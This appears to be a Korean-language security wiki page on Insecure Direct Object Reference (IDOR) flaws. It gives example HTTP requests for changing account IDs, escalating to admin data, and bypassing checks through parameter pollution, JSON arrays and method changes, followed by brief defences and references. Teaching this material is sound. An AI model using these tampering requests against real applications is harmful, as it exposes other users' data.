IDOR (Insecure Direct Object Reference)

IDOR (Insecure Direct Object Reference)

in

๐Ÿ” Introduction

IDOR(Insecure Direct Object References)๋Š” Access Control์—์„œ ๋ฐœ์ƒํ•˜๋Š” ์ทจ์•ฝ์  ์ค‘ ์™ธ๋ถ€์— ๋…ธ์ถœ๋˜๊ฑฐ๋‚˜ ์ œ๊ณต๋˜๋Š” ์ž…๋ ฅ์ด Object์— ์ง์ ‘ ์ฐธ๊ณ ํ•˜๊ณ  ์—‘์„ธ์Šคํ•  ๋•Œ ์ด๋ฅผ ์ด์šฉํ•˜์—ฌ ๋ณธ์ธ์˜ ๊ถŒํ•œ์„ ๋„˜์–ด์„œ๋Š” ์•ก์…˜์„ ์ˆ˜ํ–‰ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

Origin Request

GET /info?accountId=15442

IDOR Request

GET /info?accountId=1110

์ผ๋ฐ˜์ ์œผ๋ก  Horizontal privilege escalation ์ฆ‰, ์ˆ˜ํ‰์ ์œผ๋กœ ๊ถŒํ•œ์„ ์•…์šฉํ•  ์ˆ˜ ์žˆ์ง€๋งŒ ๋•Œ๋•Œ๋กœ ์–ดํ”Œ๋ฆฌ์ผ€์ด์…˜ ๊ตฌ์„ฑ์ด๋‚˜ ์ •์ฑ…์— ๋”ฐ๋ผ์„œ Vertical privilege escalation(์ˆ˜์ง์  ๊ถŒํ•œ ์ƒ์Šน)์œผ๋กœ ์—ฐ๊ฒฐ๋  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

๐Ÿ—ก Offensive techniques

Detect

์–ดํ”Œ๋ฆฌ์ผ€์ด์…˜ ์ฒ˜๋ฆฌ ๋กœ์ง์—์„œ ์‚ฌ์šฉ์ž ์ž…๋ ฅ ๊ฐ’์ด Object์— ์ง์ ‘ ์ฐธ์กฐ๋˜๋Š” ๋ถ€๋ถ„๋“ค์ด ๋ชจ๋‘ ์˜ํ–ฅ ๋ฐ›์Šต๋‹ˆ๋‹ค. ์ผ๋ฐ˜์ ์œผ๋กœ ID, Username ๋“ฑ ์‹๋ณ„ ๊ฐ’์ด ํฌ์ธํŠธ๊ฐ€ ๋˜๋ฉฐ, ํŒŒ๋ผ๋ฏธํ„ฐ๊ฐ€ ์•„๋‹Œ Static File ๋“ฑ์—์„œ๋„ ์‹๋ณ„ ์ •๋ณด๋ฅผ ๊ธฐ๋ฐ˜์œผ๋กœํ•œ ๋ฐ์ดํ„ฐ ์ฐธ์กฐ๊ฐ€ ์žˆ๋Š” ๊ฒฝ์šฐ IDOR์˜ ์˜ํ–ฅ์„ ๋ฐ›์„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

Origin Request

POST /save_profile HTTP/1.1

account=15442&name=aaa

IDOR Request

POST /save_profile HTTP/1.1

account=1110&name=aaa

์œ„ ์˜ˆ์‹œ์—์„œ account์™€ ๊ฐ™์ด ์‚ฌ์šฉ์ž์˜ Object์— ์ฐธ์กฐ๋ ๋งŒํ•œ ํŒŒ๋ผ๋ฏธํ„ฐ์— ๋‹ค๋ฅธ ์‚ฌ์šฉ์ž์˜ ๊ฐ’์„ ๋„ฃ์–ด ์–ดํ”Œ๋ฆฌ์ผ€์ด์…˜์˜ ์ฒ˜๋ฆฌ, ๋ฆฌํ„ด๋˜๋Š” ๋ฐ˜์‘์„ ์‚ดํ•๋‹ˆ๋‹ค. ๋งŒ์•ฝ account ๊ฐ’์„ 1110์„ ์‚ฌ์šฉํ•˜๋Š” ์œ ์ €์˜ ๋ฐ์ดํ„ฐ๊ฐ€ ๋ณ€๊ฒฝ๋˜์—ˆ๋‹ค๋ฉด IDOR์— ์ทจ์•ฝํ•œ ๊ฒƒ์œผ๋กœ ํŒ๋‹จํ•ฉ๋‹ˆ๋‹ค.

With HUNT

ZAP, Burpsuite์—์„  HUNT๋ผ๋Š” AddOn์„ ํ†ตํ•ด IDOR์˜ ๊ฐ€๋Šฅ์„ฑ์„ ๊ฐ€์ง€๋Š” Request๋ฅผ Passive Scan ํ˜•ํƒœ๋กœ ์‹๋ณ„ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ž์„ธํ•œ ๋‚ด์šฉ์€ ์•„๋ž˜ ๊ธ€์„ ์ฐธ๊ณ ํ•ด์ฃผ์„ธ์š”.

  • https://www.hahwul.com/2022/04/12/zap-hunt-remix/
  • https://www.hahwul.com/2018/04/18/bugcrowd-hunt-burp-extension/

With GF-Patterns

GF-Patterns์— ๋ช…์‹œ๋œ ๋Œ€ํ‘œ์ ์ธ ํŒŒ๋ผ๋ฏธํ„ฐ ์ด๋ฆ„์€ ์•„๋ž˜์™€ ๊ฐ™์Šต๋‹ˆ๋‹ค. ์ด๋Ÿฐ ํŒŒ๋ผ๋ฏธํ„ฐ๋“ค์€ IDOR์˜ ์ฃผ์š” ํ‘œ์ ์ด ๋ฉ๋‹ˆ๋‹ค.

{
    [
        "id=",
        "user=",
        "account=",
        "number=",
        "order=",
        "no=",
        "doc=",
        "key=",
        "email=",
        "group=",
        "profile=",
        "edit=",
        "report="
    ]
}

Exploitation

Horizontal privilege escalation

์ˆ˜ํ‰ ๊ถŒํ•œ ์ƒ์Šน์€ IDOR๋ฅผ ํ†ตํ•ด ์œ ์‚ฌํ•œ ๊ถŒํ•œ์„ ๊ฐ€์ง„ ๋‹ค๋ฅธ ์‚ฌ์šฉ์ž์˜ ๋ฐ์ดํ„ฐ๋ฅผ ์ฒ˜๋ฆฌํ•˜๋Š” ํ˜•ํƒœ์˜ ๋ฐฉ๋ฒ•์ž…๋‹ˆ๋‹ค.

Origin Request

POST /save_profile HTTP/1.1

account=15442&name=aaa

IDOR Request

POST /save_profile HTTP/1.1

account=1110&name=aaa

Vertical privilege escalation

์ˆ˜์ง ๊ถŒํ•œ ์ƒ์Šน์€ IDOR๋ฅผ ํ†ตํ•ด ์ƒ์œ„ ๊ถŒํ•œ์„ ๊ฐ€์ง„ ๋‹ค๋ฅธ ์‚ฌ์šฉ์ž์˜ ๋ฐ์ดํ„ฐ๋ฅผ ์ฒ˜๋ฆฌํ•˜๋Š” ํ˜•ํƒœ์˜ ๋ฐฉ๋ฒ•์ž…๋‹ˆ๋‹ค. ๋ณดํ†ต ์ผ๋ฐ˜ ๊ณ„์ •๊ฐ„์˜ ๊ถŒํ•œ ๋ฌธ์ œ๊ฐ€ ์•„๋‹Œ Admin ๋“ฑ ์ƒ์œ„ ๊ถŒํ•œ์˜ ๋ฐ์ดํ„ฐ๋ฅผ ์นจ๋ฒ”ํ•˜๋Š” ํ˜•ํƒœ์˜ ๋ฐฉ๋ฒ•์ž…๋‹ˆ๋‹ค.

Origin Request

POST /save_profile HTTP/1.1

account=15442&name=aaa

IDOR Request

POST /save_profile HTTP/1.1

admin_account=1&name=aaa

Bypass protection

HPP

IDOR๋Š” HPP(Http Parameter Pollution)์„ ํ†ตํ•ด ์šฐํšŒํ•  ์ˆ˜ ์žˆ๋Š” ๊ฒฝ์šฐ๊ฐ€ ์ข…์ข… ์žˆ์Šต๋‹ˆ๋‹ค.

Bypass Request

POST /save_profile HTTP/1.1

account=15442&account=1110&name=aaa

Bypass Request (Array)

POST /save_profile HTTP/1.1

account[]=15442&account[]=1110&name=aaa

JSON Array

Origin Request

POST /save_profile HTTP/1.1

{
    "account":"15442"
}

Origin Request

POST /save_profile HTTP/1.1

{
    "account":[
        "15442",
        "1110"
    ]
}  

Change Method

Bypass Request

PUT /save_profile HTTP/1.1

account=1110&name=aaa

๐Ÿ›ก Defensive techniques

๋Œ€์‘ ๋ฐฉ์•ˆ์€ ๊ฐ„๋‹จํ•ฉ๋‹ˆ๋‹ค. ์‚ฌ์šฉ์ž์˜ ์ž…๋ ฅ์„ ์‹ ๋ขฐํ•˜์ง€ ์•Š๊ณ  ์„ธ์…˜, ์ฟ ํ‚ค ๋“ฑ ์ธ์ฆ ์ •๋ณด์™€ ๋น„๊ตํ•˜์—ฌ ๊ถŒํ•œ์„ ์ •ํ™•ํ•˜๊ฒŒ ๊ฒ€์ฆํ•ด์•ผ ํ•ฉ๋‹ˆ๋‹ค.

๋˜ํ•œ ์ธ์ฆ ์ •๋ณด๋ฅผ ๊ฒ€์ฆํ•  ์ˆ˜ ์—†๋Š” API ๋“ฑ์˜ ๊ฒฝ์šฐ ์‚ฌ์šฉ์ž๊ฐ€ ์ง์ ‘ ๋ฐ์ดํ„ฐ๋ฅผ ํ†ต์ œํ•  ์ˆ˜ ์—†๋„๋ก ๋ฒก์—”๋“œ ๋’ค์— MSA ํ˜•ํƒœ๋กœ ์ˆจ๊ธฐ๋˜๊ฐ€ ์•ž์— ๋ณ„๋„์˜ Interface๋ฅผ ๊ตฌํ˜„ํ•˜์—ฌ ๋Œ€์‘ํ•  ์ˆ˜๋„ ์žˆ์Šต๋‹ˆ๋‹ค.

๐Ÿ•น Tools

๐Ÿ“š Articles

  • https://www.hahwul.com/2022/04/12/zap-hunt-remix/

๐Ÿ“Œ References

  • https://portswigger.net/web-security/access-control/idor
  • https://github.com/1ndianl33t/Gf-Patterns/blob/master/idor.json
  • https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Insecure%20Direct%20Object%20References
  • https://wiki.owasp.org/index.php/Testing_for_Insecure_Direct_Object_References_(OTG-AUTHZ-004)
  • https://book.hacktricks.xyz/pentesting-web/idor